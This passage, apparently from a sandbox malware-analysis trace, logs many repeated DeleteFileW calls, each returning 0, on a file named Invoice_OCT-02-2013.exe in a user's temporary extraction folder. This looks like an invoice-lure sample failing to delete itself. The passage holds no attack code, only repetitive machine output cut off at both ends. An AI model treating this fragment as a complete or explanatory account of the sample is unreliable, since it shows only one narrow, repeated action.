"c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.911] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.912] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.913] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.914] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.915] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.915] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.915] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.915] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.915] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.916] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.917] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.918] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.919] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.920] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.921] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.923] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.924] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.925] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.926] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.927] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.928] DeleteFileW 